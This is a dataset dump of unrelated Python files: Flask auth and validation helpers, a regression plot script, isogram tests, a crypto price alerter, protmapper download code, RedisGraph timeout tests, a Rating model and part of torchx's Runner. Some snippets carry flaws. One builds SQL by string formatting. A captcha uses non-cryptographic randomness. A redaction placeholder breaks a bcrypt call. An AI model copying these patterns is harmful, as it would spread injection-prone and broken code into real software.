import random
import redis
import bcrypt
from jwt import ExpiredSignatureError, InvalidTokenError
from flask import jsonify, current_app
from werkzeug.http import HTTP_STATUS_CODES
from webargs import ValidationError
from backend.models import HostGroup, PlayBook, Environment, Category
from backend.settings import playbook_dir, Operations, POOL
from backend.extensions import db, redis_conn
def isAlnum(word):
"""
判断字符串为字母和数字组成,排除中文
:param word:
:return:
"""
try:
return word.encode('ascii').isalnum()
except UnicodeEncodeError:
return False
def gen_token(user, operation, expire_in=None, **kwargs):
"""
生成token函数
:param operation: 操作类型
:param expire_in: 超时时间
:param user_id:
:return:
"""
if not expire_in:
expire_in = current_app.config.get('AUTH_EXPIRE')
data = {
"user_id": user.id,
"operation": operation,
"exp": int(datetime.datetime.now().timestamp()) + expire_in # 超时时间
}
data.update(**kwargs)
token = jwt.encode(data, current_app.config.get("SECRET_KEY"), 'HS256').decode()
return token
def validate_token(user, token, operation, new_password=None):
"""验证token"""
try:
data = jwt.decode(token, current_app.config.get("SECRET_KEY"), algorithms=['HS256'])
except (ExpiredSignatureError, InvalidTokenError):
return False
if operation != data.get('operation') or user.id != data.get('user_id'):
return False
if operation == Operations.CONFIRM:
user.confirmed = True
elif operation == Operations.RESET_PASSWORD:
user.password = <PASSWORD>(new_password.encode(), bcrypt.gensalt())
else:
return False
db.session.commit()
return True
def validate_ip(val):
"""校验ip类型"""
try:
ip = ipaddress.ip_address(val)
if ip.is_loopback or ip.is_multicast or ip.is_reserved:
raise ValueError
except ValueError as e:
raise ValidationError("非法的IP地址")
def validate_json(val):
"""校验json格式"""
try:
print(val)
json.loads(val)
except ValueError:
raise ValidationError("json格式错误")
def validate_playbook(val):
"""校验playbook文件是否存在"""
os.chdir(playbook_dir)
file_list = glob.glob('*.y*ml')
if val not in file_list:
raise ValidationError("playbook文件不存在")
def validate_group_id(val):
gid = HostGroup.query.get(val)
if not gid:
raise ValidationError("主机组不存在")
def validate_playbook_id(val):
pid = PlayBook.query.get(val)
if not pid:
raise ValidationError("playbook不存在")
def validate_env_id(val):
pid = Environment.query.get(val)
if not pid:
raise ValidationError("环境参数错误")
def validate_category_id(val):
cid = Category.query.get(val)
if not cid:
raise ValidationError("分类不存在")
def api_abort(code, message=None, **kwargs):
if message is None:
message = HTTP_STATUS_CODES.get(code, '')
response = jsonify(code=code, message=message, **kwargs)
response.status_code = code
return response
def gen_captcha():
"""生成验证码函数"""
tmp_list = []
for i in range(4):
u = chr(random.randint(65, 90)) # 大写字母
l = chr(random.randint(97, 122)) # 小写字母
n = str(random.randint(0, 9)) # 数字
tmp = random.choice([u, l, n])
tmp_list.append(tmp)
return "".join(tmp_list), tmp_list
def get_random_color():
"""定义随机获取颜色的函数"""
return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)
def validate_capcha(cap_id, user_cap):
"""验证用户输入的验证码"""
capcha = redis_conn.get(cap_id)
print(capcha.decode())
if not capcha: return False
if user_cap.lower() == capcha.decode():
return True
else:
return False
def get_task_progress(task_obj):
"""获取任务执行进度"""
percentage = 0
total_step = PlayBook.query.filter(PlayBook.name == task_obj.playbook).first().step
progress = True if total_step else False
# 已完成的任务进度为100
if task_obj.state.code == 2:
percentage = 100
return progress, percentage
# 获取未完成的任务
over_task_count = redis_conn.llen(task_obj.ansible_id)
if total_step:
percentage = round((over_task_count / total_step) * 100)
return progress, percentage
def model_to_dict(result):
from collections import Iterable
# 转换完成后,删除 '_sa_instance_state' 特殊属性
try:
if isinstance(result, Iterable):
tmp = [dict(zip(res.__dict__.keys(), res.__dict__.values())) for res in result]
for t in tmp:
t.pop('_sa_instance_state')
else:
tmp = dict(zip(result.__dict__.keys(), result.__dict__.values()))
tmp.pop('_sa_instance_state')
return tmp
except BaseException as e:
print(e.args)
raise TypeError('Type error of parameter')
|
StarcoderdataPython
|
1695094
|
# -*- coding: utf-8 -*-
# Visualizzazione dell'andamento della funzione di errore quadratico nella regressione
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import seaborn as sns
# +
plt.style.use('fivethirtyeight')
plt.rcParams['font.family'] = 'sans-serif'
plt.rcParams['font.serif'] = 'Ubuntu'
plt.rcParams['font.monospace'] = 'Ubuntu Mono'
plt.rcParams['font.size'] = 10
plt.rcParams['axes.labelsize'] = 10
plt.rcParams['axes.labelweight'] = 'bold'
plt.rcParams['axes.titlesize'] = 10
plt.rcParams['xtick.labelsize'] = 8
plt.rcParams['ytick.labelsize'] = 8
plt.rcParams['legend.fontsize'] = 10
plt.rcParams['figure.titlesize'] = 12
plt.rcParams['image.cmap'] = 'jet'
plt.rcParams['image.interpolation'] = 'none'
plt.rcParams['figure.figsize'] = (16, 8)
plt.rcParams['lines.linewidth'] = 2
plt.rcParams['lines.markersize'] = 8
colors = ['xkcd:pale orange', 'xkcd:sea blue', 'xkcd:pale red', 'xkcd:sage green', 'xkcd:terra cotta', 'xkcd:dull purple', 'xkcd:teal', 'xkcd:goldenrod', 'xkcd:cadet blue',
'xkcd:scarlet']
# -
# definisce un vettore di colori
colors = sns.color_palette("husl", 4)
# dichiara alcune proprietà grafiche della figura
sns.set(style="darkgrid", context='paper', palette=colors, rc={"figure.figsize": (16, 8),'image.cmap': 'jet', 'lines.linewidth':.7})
# legge i dati in dataframe pandas
data = pd.read_csv("../dataset/cars.csv", delimiter=',', header=0, names=['X','y'])
# calcola dimensione dei dati
n = len(data)
# visualizza dati mediante scatter
fig = plt.figure()
fig.patch.set_facecolor('white')
ax = fig.gca()
ax.scatter(data['X'], data['y'], s=40,c='r', marker='o', alpha=.5)
plt.xlabel(u'Velocità in mph', fontsize=14)
plt.ylabel('Distanza di arresto in ft', fontsize=14)
plt.show()
# Estrae dal dataframe l'array X delle features e aggiunge ad esso una colonna di 1
X=np.array(data['X']).reshape(-1,1)
X = np.column_stack((np.ones(n), X))
# Estrae dal dataframe l'array t dei valori target
t=np.array(data['y']).reshape(-1,1)
# mostra distribuzione dell'errore quadratico medio al variare dei coefficienti
# insieme dei valori considerati per i coefficienti
w0_list = np.linspace(-100, 100, 100)
w1_list = np.linspace(-100, 100, 100)
# crea una griglia di coppie di valori
w0, w1 = np.meshgrid(w0_list, w1_list)
# definisce la funzione da calcolare in ogni punto della griglia
def error(v1, v2):
theta = np.array((v1, v2)).reshape(-1, 1)
e=(np.dot(X,theta)-t)
return np.dot(e.T,e)[0,0]/(2*n)
v_error=np.vectorize(error)
e=v_error(w0,w1).T
fig = plt.figure()
fig.patch.set_facecolor('white')
ax = fig.gca(projection='3d')
surf=ax.plot_surface(w0, w1, e, rstride=1, cstride=1, cmap=plt.cm.jet , linewidth=0, antialiased=True)
ax.tick_params(axis='x', labelsize=8)
ax.tick_params(axis='y', labelsize=8)
ax.tick_params(axis='z', labelsize=8)
plt.xlabel(r"$w_0$", fontsize=12)
plt.ylabel(r"$w_1$", fontsize=12)
plt.title(r"Errore quadratico medio al variare dei coefficienti $w_0,w_1$", fontsize=12)
fig.colorbar(surf, shrink=0.5, aspect=7, cmap=plt.cm.jet)
plt.show()
fig = plt.figure(figsize=(12,12))
fig.patch.set_facecolor('white')
ax = fig.gca()
im = plt.imshow(e, origin='lower', extent=(w0_list.min(),w0_list.max(),w1_list.min(), w1_list.max()), aspect='auto',alpha=.8)
#plt.contour(w0, w1, e,color='r', lw=0.7)
ax.tick_params(axis='x', labelsize=8)
ax.tick_params(axis='y', labelsize=8)
plt.xlabel(r"$w_0$", fontsize=12)
plt.ylabel(r"$w_1$", fontsize=12)
plt.title(r"Errore quadratico medio al variare dei coefficienti $w_0,w_1$", fontsize=12)
fig.colorbar(im, shrink=0.5, aspect=7, cmap=plt.cm.jet)
plt.show()
|
StarcoderdataPython
|
3296246
|
<filename>python/isogram/isogram_test.py
import unittest
from isogram import is_isogram
# Tests adapted from `problem-specifications//canonical-data.json` @ v1.6.0
class IsogramTest(unittest.TestCase):
def test_empty_string(self):
self.assertIs(is_isogram(""), True)
def test_isogram_with_only_lower_case_characters(self):
self.assertIs(is_isogram("isogram"), True)
def test_word_with_one_duplicated_character(self):
self.assertIs(is_isogram("eleven"), False)
def test_word_with_one_duplicated_character_from_end_of_alphabet(self):
self.assertIs(is_isogram("zzyzx"), False)
def test_longest_reported_english_isogram(self):
self.assertIs(is_isogram("subdermatoglyphic"), True)
def test_word_with_duplicated_character_in_mixed_case(self):
self.assertIs(is_isogram("Alphabet"), False)
def test_word_with_duplicated_letter_in_mixed_case_lowercase_first(self):
self.assertIs(is_isogram("alphAbet"), False)
def test_hypothetical_isogrammic_word_with_hyphen(self):
self.assertIs(is_isogram("thumbscrew-japingly"), True)
def test_isogram_with_duplicated_hyphen(self):
self.assertIs(is_isogram("six-year-old"), True)
def test_made_up_name_that_is_an_isogram(self):
self.assertIs(is_isogram("<NAME>"), True)
def test_duplicated_character_in_the_middle(self):
self.assertIs(is_isogram("accentor"), False)
def test_same_first_and_last_characters(self):
self.assertIs(is_isogram("angola"), False)
# Additional tests for this track
def test_isogram_with_duplicated_letter_and_nonletter_character(self):
self.assertIs(is_isogram("Aleph Bot Chap"), False)
if __name__ == '__main__':
unittest.main(exit=False)
|
StarcoderdataPython
|
112701
|
from requests import Request, Session
from requests.exceptions import ConnectionError, Timeout, TooManyRedirects
import json
import time, datetime
import sys
import schedule
global is_test
is_test = False
def check_crypto(config_json, last_sent):
print("Debug: Job Started " + str(datetime.datetime.utcnow()))
total_message = ""
special_message = ""
data = get_cmcprices(config_json)
if not data:
return
if not "data" in data:
return
for crypto in data["data"].values():
for quote_key in crypto["quote"]:
if quote_key != "USD":
continue
quote = crypto["quote"][quote_key]
total_message += crypto["symbol"] + ": " + str(quote["price"]) + "\n"
if not "checks" in config_json:
continue
for checker in config_json["checks"]:
if crypto["symbol"] != checker["symbol"]:
continue
if crypto["symbol"] != checker["symbol"]:
continue
if checker["type"] == "lowerthan" and quote["price"] < checker["value"]:
if not checker["name"] in last_sent or not last_sent[checker["name"]]:
special_message += "{0} price has plummeted below {1}.\n".format(checker["symbol"], checker["value"])
last_sent[checker["name"]] = True
elif checker["type"] == "greaterthan" and quote["price"] > checker["value"]:
if not checker["name"] in last_sent or not last_sent[checker["name"]]:
special_message += "{0} price has risen above {1}.\n".format(checker["symbol"], checker["value"])
last_sent[checker["name"]] = True
else:
last_sent[checker["name"]] = False
print(total_message)
if special_message != "":
if is_test:
print("message (not sent):" + special_message)
else:
message_pushover(special_message, config_json)
sys.stdout.flush()
sys.stderr.flush()
def get_cmcprices(config_json):
url = config_json["cmcurl"]
parameters = {
'symbol':'BTC,ETH,BNB,USDT,ADA,DOGE'
}
headers = {
'Accepts': 'application/json',
'X-CMC_PRO_API_KEY': config_json["cmckey"],
}
session = Session()
session.headers.update(headers)
try:
data = {}
if is_test:
with open("test.json", "r") as check_file:
data = json.loads(check_file.read())
else:
response = session.get(url, params=parameters)
data = json.loads(response.text)
return data
except (ConnectionError, Timeout, TooManyRedirects) as e:
print(e)
return None
def message_pushover(message, config_json):
url = config_json["pushoverurl"]
parameters = {
'token': config_json["pushovertoken"],
'user': config_json["pushoveruser"],
'message': message
}
headers = {
'Accepts': 'application/json'
}
session = Session()
session.headers.update(headers)
try:
response = session.post(url, params=parameters)
data = json.loads(response.text)
except (ConnectionError, Timeout, TooManyRedirects) as e:
print(e)
def main():
args = sys.argv[1:]
if "-test" in args:
global is_test
is_test = True
config_json = {}
last_sent = {}
with open("config.json", "r") as check_file:
config_json = json.loads(check_file.read())
check_crypto(config_json, last_sent)
if is_test:
schedule.every(5).seconds.do(lambda: check_crypto(config_json, last_sent))
else:
schedule.every(20).minutes.do(lambda: check_crypto(config_json, last_sent))
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1675927
|
<filename>protmapper/resources.py
import os
import csv
import zlib
import boto3
import logging
import argparse
import requests
import botocore
from ftplib import FTP
from io import BytesIO, StringIO
from urllib.request import urlretrieve
from . import __version__
logger = logging.getLogger('protmapper.resources')
# If the protmapper resource directory does not exist, try to create it
home_dir = os.path.expanduser('~')
resource_dir = os.path.join(home_dir, '.protmapper', __version__)
if not os.path.isdir(resource_dir):
try:
os.makedirs(resource_dir)
except Exception:
logger.warning(resource_dir + ' already exists')
def _download_from_s3(key, out_file):
s3 = boto3.client('s3',
config=botocore.client.Config(
signature_version=botocore.UNSIGNED))
tc = boto3.s3.transfer.TransferConfig(use_threads=False)
# Path to the versioned resource file
full_key = 'protmapper/%s/%s' % (__version__, key)
s3.download_file('bigmech', full_key, out_file, Config=tc)
def _download_ftp_gz(ftp_host, ftp_path, out_file=None, ftp_blocksize=33554432):
ftp = FTP(ftp_host)
ftp.login()
gzf_bytes = BytesIO()
ftp.retrbinary('RETR %s' % ftp_path,
callback=lambda s: gzf_bytes.write(s),
blocksize=ftp_blocksize)
ret = gzf_bytes.getvalue()
ret = zlib.decompress(ret, 16+zlib.MAX_WBITS)
if out_file is not None:
with open(out_file, 'wb') as f:
f.write(ret)
return ret
def download_phosphositeplus(out_file, cached=True):
logger.info("Note that PhosphoSitePlus data is not available for "
"commercial use; please see full terms and conditions at: "
"https://www.psp.org/staticDownloads")
_download_from_s3('Phosphorylation_site_dataset.tsv', out_file)
def download_uniprot_entries(out_file, cached=True):
if cached:
_download_from_s3('uniprot_entries.tsv', out_file)
return
columns = ['id', 'genes(PREFERRED)', 'entry%20name', 'database(RGD)',
'database(MGI)', 'length', 'reviewed', 'feature(SIGNAL)']
columns_str = ','.join(columns)
logger.info('Downloading UniProt entries')
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=id&desc=no&compress=no&query=reviewed:yes&' + \
'format=tab&columns=' + columns_str
logger.info('Downloading %s' % url)
res = requests.get(url)
if res.status_code != 200:
logger.info('Failed to download "%s"' % url)
reviewed_entries = res.content
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=id&desc=no&compress=no&query=reviewed:no&fil=organism:' + \
'%22Homo%20sapiens%20(Human)%20[9606]%22&' + \
'format=tab&columns=' + columns_str
logger.info('Downloading %s' % url)
res = requests.get(url)
if res.status_code != 200:
logger.info('Failed to download "%s"' % url)
unreviewed_human_entries = res.content
if not((reviewed_entries is not None) and
(unreviewed_human_entries is not None)):
return
unreviewed_human_entries = unreviewed_human_entries.decode('utf-8')
reviewed_entries = reviewed_entries.decode('utf-8')
lines = reviewed_entries.strip('\n').split('\n')
lines += unreviewed_human_entries.strip('\n').split('\n')[1:]
# At this point, we need to clean up the gene names.
logger.info('Processing UniProt entries list.')
for i, line in enumerate(lines):
if i == 0:
continue
terms = line.split('\t')
# If there are multiple gene names, take the first one
gene_names = terms[1].split(';')
terms[1] = gene_names[0]
# Join the line again after the change
lines[i] = '\t'.join(terms)
# Join all lines into a single string
full_table = '\n'.join(lines)
logging.info('Saving into %s.' % out_file)
with open(out_file, 'wb') as fh:
fh.write(full_table.encode('utf-8'))
def download_uniprot_sec_ac(out_file, cached=True):
if cached:
_download_from_s3('uniprot_sec_ac.txt', out_file)
return
logger.info('Downloading UniProt secondary accession mappings')
url = 'ftp://ftp.uniprot.org/pub/databases/uniprot/knowledgebase/' + \
'docs/sec_ac.txt'
urlretrieve(url, out_file)
def download_hgnc_entries(out_file, cached=True):
if cached:
_download_from_s3('hgnc_entries.tsv', out_file)
return
logger.info('Downloading HGNC entries')
url = 'http://tinyurl.com/y83dx5s6'
res = requests.get(url)
if res.status_code != 200:
logger.error('Failed to download "%s"' % url)
return
logger.info('Saving into %s' % out_file)
with open(out_file, 'wb') as fh:
fh.write(res.content)
def download_swissprot(out_file, cached=True):
if cached:
_download_from_s3('uniprot_sprot.fasta', out_file)
return
logger.info('Downloading reviewed protein sequences from SwissProt')
ftp_path = ('/pub/databases/uniprot/current_release/knowledgebase/'
'complete/uniprot_sprot.fasta.gz')
_download_ftp_gz('ftp.uniprot.org', ftp_path, out_file)
def download_isoforms(out_file, cached=True):
if cached:
_download_from_s3('uniprot_sprot_varsplic.fasta', out_file)
return
logger.info('Downloading isoform sequences from Uniprot')
ftp_path = ('/pub/databases/uniprot/current_release/knowledgebase/'
'complete/uniprot_sprot_varsplic.fasta.gz')
_download_ftp_gz('ftp.uniprot.org', ftp_path, out_file)
def download_refseq_seq(out_file, cached=True):
if cached:
_download_from_s3('refseq_sequence.fasta', out_file)
return
ftp_path = ('/refseq/H_sapiens/annotation/GRCh38_latest/'
'refseq_identifiers/GRCh38_latest_protein.faa.gz')
_download_ftp_gz('ftp.ncbi.nlm.nih.gov', ftp_path, out_file)
def download_refseq_uniprot(out_file, cached=True):
if cached:
_download_from_s3('refseq_uniprot.csv', out_file)
return
logger.info('Downloading RefSeq->Uniprot mappings from Uniprot')
ftp_path = ('/pub/databases/uniprot/current_release/knowledgebase/'
'idmapping/by_organism/HUMAN_9606_idmapping.dat.gz')
mappings_bytes = _download_ftp_gz('ftp.uniprot.org', ftp_path,
out_file=None)
logger.info('Processing RefSeq->Uniprot mappings file')
mappings_io = StringIO(mappings_bytes.decode('utf8'))
csvreader = csv.reader(mappings_io, delimiter='\t')
filt_rows = []
for up_id, other_type, other_id in csvreader:
if other_type == 'RefSeq':
filt_rows.append([other_id, up_id])
# Write the file with just the RefSeq->UP mappings
with open(out_file, 'wt') as f:
csvwriter = csv.writer(f)
csvwriter.writerows(filt_rows)
RESOURCE_MAP = {
'hgnc': ('hgnc_entries.tsv', download_hgnc_entries),
'upsec': ('uniprot_sec_ac.txt', download_uniprot_sec_ac),
'up': ('uniprot_entries.tsv', download_uniprot_entries),
'psp': ('Phosphorylation_site_dataset.tsv', download_phosphositeplus),
'swissprot': ('uniprot_sprot.fasta', download_swissprot),
'isoforms': ('uniprot_sprot_varsplic.fasta', download_isoforms),
'refseq_uniprot': ('refseq_uniprot.csv', download_refseq_uniprot),
'refseq_seq': ('refseq_sequence.fasta', download_refseq_seq),
}
class ResourceManager(object):
"""Class to manage a set of resource files.
Parameters
----------
resource_map : dict
A dict that maps resource file IDs to a tuple of resource file names
and download functions.
"""
def __init__(self, resource_map):
self.resource_map = resource_map
def get_resource_file(self, resource_id):
"""Return the path to the resource file with the given ID.
Parameters
----------
resource_id : str
The ID of the resource.
Returns
-------
str
The path to the resource file.
"""
return os.path.join(resource_dir, self.resource_map[resource_id][0])
def get_download_fun(self, resource_id):
"""Return the download function for the given resource.
Parameters
----------
resource_id : str
The ID of the resource.
Returns
-------
function
The download function for the given resource.
"""
return self.resource_map[resource_id][1]
def has_resource_file(self, resource_id):
"""Return True if the resource file exists for the given ID.
Parameters
----------
resource_id : str
The ID of the resource.
Returns
-------
bool
True if the resource file exists, false otherwise.
"""
fname = self.get_resource_file(resource_id)
return os.path.exists(fname)
def download_resource_file(self, resource_id, cached=True):
"""Download the resource file corresponding to the given ID.
Parameters
----------
resource_id : str
The ID of the resource.
cached : Optional[bool]
If True, the download is a pre-processed file from S3, otherwise
the download is obtained and processed from the primary source.
Default: True
"""
download_fun = self.get_download_fun(resource_id)
fname = self.get_resource_file(resource_id)
logger.info('Downloading \'%s\' resource file into %s%s.' %
(resource_id, fname, ' from cache' if cached else ''))
download_fun(fname, cached=cached)
def get_create_resource_file(self, resource_id, cached=True):
"""Return the path to the resource file, download if it doesn't exist.
Parameters
----------
resource_id : str
The ID of the resource.
cached : Optional[bool]
If True, the download is a pre-processed file from S3, otherwise
the download is obtained and processed from the primary source.
Default: True
Returns
-------
str
The path to the resource file.
"""
if not self.has_resource_file(resource_id):
logger.info(('Could not access \'%s\' resource'
' file, will download.') % resource_id)
self.download_resource_file(resource_id, cached)
return self.get_resource_file(resource_id)
def get_resource_ids(self):
"""Return a list of all the resource IDs managed by this manager."""
return list(self.resource_map.keys())
resource_manager = ResourceManager(RESOURCE_MAP)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# By default we use the cache
parser.add_argument('--uncached', action='store_true')
# By default we use get_create which doesn't do anything if the resource
# already exists. With the download flag, we force re-download.
parser.add_argument('--download', action='store_true')
args = parser.parse_args()
resource_ids = resource_manager.get_resource_ids()
for resource_id in resource_ids:
if not args.download:
resource_manager.get_create_resource_file(resource_id,
cached=(not
args.uncached))
else:
resource_manager.download_resource_file(resource_id,
cached=(not args.uncached))
|
StarcoderdataPython
|
1785332
|
<gh_stars>0
def clear_all_entries(first_name, last_name, street, city, state, zipcode):
first_name.delete(0, "end")
last_name.delete(0, "end")
street.delete(0, "end")
city.delete(0, "end")
state.delete(0, "end")
zipcode.delete(0, "end")
first_name.focus_set()
def clear_all_widgets(window):
for widget in window.winfo_children():
widget.destroy()
|
StarcoderdataPython
|
4828999
|
<gh_stars>100-1000
from common import *
redis_con = None
redis_graph = None
class testQueryTimeout(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
# skip test if we're running under Valgrind
if self.env.envRunner.debugger is not None or os.getenv('COV') == '1':
self.env.skip() # queries will be much slower under Valgrind
global redis_con
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, "timeout")
def test01_read_query_timeout(self):
query = "UNWIND range(0,1000000) AS x WITH x AS x WHERE x = 10000 RETURN x"
try:
# The query is expected to timeout
redis_graph.query(query, timeout=1)
assert(False)
except ResponseError as error:
self.env.assertContains("Query timed out", str(error))
try:
# The query is expected to succeed
redis_graph.query(query, timeout=2000)
except:
assert(False)
def test02_configured_timeout(self):
# Verify that the module-level timeout is set to the default of 0
response = redis_con.execute_command("GRAPH.CONFIG GET timeout")
self.env.assertEquals(response[1], 0)
# Set a default timeout of 1 millisecond
redis_con.execute_command("GRAPH.CONFIG SET timeout 1")
response = redis_con.execute_command("GRAPH.CONFIG GET timeout")
self.env.assertEquals(response[1], 1)
# Validate that a read query times out
query = "UNWIND range(0,1000000) AS x WITH x AS x WHERE x = 10000 RETURN x"
try:
redis_graph.query(query)
assert(False)
except ResponseError as error:
self.env.assertContains("Query timed out", str(error))
def test03_timeout_index_scan(self):
# set timeout to unlimited
redis_con.execute_command("GRAPH.CONFIG SET timeout 0")
# construct a graph and create multiple indices
query = """UNWIND range(0, 500000) AS x CREATE (p:Person {age: x%90, height: x%200, weight: x%80})"""
redis_graph.query(query)
query = """CREATE INDEX ON :Person(age, height, weight)"""
redis_graph.query(query)
queries = [
# full scan
"MATCH (a) RETURN a",
# ID scan
"MATCH (a) WHERE ID(a) > 20 RETURN a",
# label scan
"MATCH (a:Person) RETURN a",
# single index scan
"MATCH (a:Person) WHERE a.age > 40 RETURN a",
# index scan + full scan
"MATCH (a:Person), (b) WHERE a.age > 40 RETURN a, b",
# index scan + ID scan
"MATCH (a:Person), (b) WHERE a.age > 40 AND ID(b) > 20 RETURN a, b",
# index scan + label scan
"MATCH (a:Person), (b:Person) WHERE a.age > 40 RETURN a, b",
# multi full and index scans
"MATCH (a:Person), (b:Person), (c), (d) WHERE a.age > 40 AND b.height < 150 RETURN a,b,c,d",
# multi ID and index scans
"MATCH (a:Person), (b:Person), (c:Person), (d) WHERE a.age > 40 AND b.height < 150 AND ID(c) > 20 AND ID(d) > 30 RETURN a,b,c,d",
# multi label and index scans
"MATCH (a:Person), (b:Person), (c:Person), (d:Person) WHERE a.age > 40 AND b.height < 150 RETURN a,b,c,d",
# multi index scans
"MATCH (a:Person), (b:Person), (c:Person) WHERE a.age > 40 AND b.height < 150 AND c.weight = 50 RETURN a,b,c"
]
for q in queries:
try:
# query is expected to timeout
redis_graph.query(q, timeout=1)
assert(False)
except ResponseError as error:
self.env.assertContains("Query timed out", str(error))
# rerun each query with timeout and limit
# expecting queries to run to completion
for q in queries:
q += " LIMIT 2"
redis_graph.query(q, timeout=10)
# validate that server didn't crash
redis_con.ping()
def test05_query_timeout_free_resultset(self):
query = "UNWIND range(0,1000000) AS x RETURN toString(x)"
try:
# The query is expected to timeout
redis_graph.query(query, timeout=10)
assert(False)
except ResponseError as error:
self.env.assertContains("Query timed out", str(error))
try:
# The query is expected to succeed
redis_graph.query(query, timeout=2000)
except:
assert(False)
|
StarcoderdataPython
|
3317200
|
from models.model import Model
class Rating(Model):
def __init__(self, table_name, is_active, value, user_id, site_id):
super(Rating, self).__init__(table_name, is_active)
self.value = value
self.user_id = user_id
self.site_id = site_id
def generate_insert(self):
return "insert into {} (value, user_id, site_id, is_active) values ({}, {}, {}, {});" \
.format(self.table_name, self.value, self.user_id, self.site_id, self.is_active)
def __repr__(self):
return "Site: {} rated with {} by {}".format(self.site_id, self.value, self.user_id)
|
StarcoderdataPython
|
75241
|
<reponame>ldworkin/torchx
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import json
import logging
import time
from datetime import datetime
from types import TracebackType
from typing import Any, Dict, Iterable, List, Mapping, Optional, Tuple, Type
from pyre_extensions import none_throws
from torchx.runner.events import log_event
from torchx.schedulers import get_schedulers
from torchx.schedulers.api import Scheduler, Stream
from torchx.specs import (
AppDef,
AppDryRunInfo,
AppHandle,
AppStatus,
CfgVal,
SchedulerBackend,
UnknownAppException,
from_function,
make_app_handle,
parse_app_handle,
runopts,
)
from torchx.specs.finder import get_component
logger: logging.Logger = logging.getLogger(__name__)
NONE: str = "<NONE>"
class Runner:
"""
TorchX individual component runner. Has the methods for the user to
act upon ``AppDefs``. The ``Runner`` will cache information about the
launched apps if they were launched locally otherwise it's up to the
specific scheduler implementation.
"""
def __init__(
self,
name: str,
schedulers: Dict[SchedulerBackend, Scheduler],
component_defaults: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
"""
Creates a new runner instance.
Args:
name: the human readable name for this session. Jobs launched will
inherit this name.
schedulers: a list of schedulers the runner can use.
"""
self._name: str = name
self._schedulers = schedulers
self._apps: Dict[AppHandle, AppDef] = {}
# component_name -> map of component_fn_param_name -> user-specified default val encoded as str
self._component_defaults: Dict[str, Dict[str, str]] = component_defaults or {}
def __enter__(self) -> "Runner":
return self
def __exit__(
self,
type: Optional[Type[BaseException]],
value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> bool:
# This method returns False so that if an error is raise within the
# ``with`` statement, it is reraised properly
# see: https://docs.python.org/3/reference/compound_stmts.html#with
# see also: torchx/runner/test/api_test.py#test_context_manager_with_error
#
self.close()
return False
def close(self) -> None:
"""
Closes this runner and frees/cleans up any allocated resources.
Transitively calls the ``close()`` method on all the schedulers.
Once this method is called on the runner, the runner object is deemed
invalid and any methods called on the runner object as well as
the schedulers associated with this runner have undefined behavior.
It is ok to call this method multiple times on the same runner object.
"""
for name, scheduler in self._schedulers.items():
scheduler.close()
def run_component(
self,
component: str,
component_args: List[str],
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppHandle:
"""
Runs a component.
``component`` has the following resolution order(high to low):
* User-registered components. Users can register components via
https://packaging.python.org/specifications/entry-points/. Method looks for
entrypoints in the group ``torchx.components``.
* Builtin components relative to `torchx.components`. The path to the component should
be module name relative to `torchx.components` and function name in a format:
``$module.$function``.
* File-based components in format: ``$FILE_PATH:FUNCTION_NAME``. Both relative and
absolute paths supported.
Usage:
.. code-block:: python
# resolved to torchx.components.distributed.ddp()
runner.run_component("distributed.ddp", ...)
# resolved to my_component() function in ~/home/components.py
runner.run_component("~/home/components.py:my_component", ...)
Returns:
An application handle that is used to call other action APIs on the app
Raises:
ComponentValidationException: if component is invalid.
ComponentNotFoundException: if the ``component_path`` is failed to resolve.
"""
dryrun_info = self.dryrun_component(component, component_args, scheduler, cfg)
return self.schedule(dryrun_info)
def dryrun_component(
self,
component: str,
component_args: List[str],
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppDryRunInfo:
"""
Dryrun version of :py:func:`run_component`. Will not actually run the
component, but just returns what "would" have run.
"""
component_def = get_component(component)
app = from_function(
component_def.fn,
component_args,
self._component_defaults.get(component, None),
)
return self.dryrun(app, scheduler, cfg)
def run(
self,
app: AppDef,
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppHandle:
"""
Runs the given application in the specified mode.
.. note:: sub-classes of ``Runner`` should implement ``schedule`` method
rather than overriding this method directly.
Returns:
An application handle that is used to call other action APIs on the app.
"""
dryrun_info = self.dryrun(app, scheduler, cfg)
return self.schedule(dryrun_info)
def schedule(self, dryrun_info: AppDryRunInfo) -> AppHandle:
"""
Actually runs the application from the given dryrun info.
Useful when one needs to overwrite a parameter in the scheduler
request that is not configurable from one of the object APIs.
.. warning:: Use sparingly since abusing this method to overwrite
many parameters in the raw scheduler request may
lead to your usage of TorchX going out of compliance
in the long term. This method is intended to
unblock the user from experimenting with certain
scheduler-specific features in the short term without
having to wait until TorchX exposes scheduler features
in its APIs.
.. note:: It is recommended that sub-classes of ``Session`` implement
this method instead of directly implementing the ``run`` method.
Usage:
::
dryrun_info = session.dryrun(app, scheduler="default", cfg)
# overwrite parameter "foo" to "bar"
dryrun_info.request.foo = "bar"
app_handle = session.submit(dryrun_info)
"""
scheduler = none_throws(dryrun_info._scheduler)
cfg = dryrun_info._cfg
with log_event(
"schedule", scheduler, runcfg=json.dumps(cfg) if cfg else None
) as ctx:
sched = self._scheduler(scheduler)
app_id = sched.schedule(dryrun_info)
app_handle = make_app_handle(scheduler, self._name, app_id)
app = none_throws(dryrun_info._app)
self._apps[app_handle] = app
_, _, app_id = parse_app_handle(app_handle)
ctx._torchx_event.app_id = app_id
return app_handle
def name(self) -> str:
return self._name
def dryrun(
self,
app: AppDef,
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppDryRunInfo:
"""
Dry runs an app on the given scheduler with the provided run configs.
Does not actually submit the app but rather returns what would have been
submitted. The returned ``AppDryRunInfo`` is pretty formatted and can
be printed or logged directly.
Usage:
::
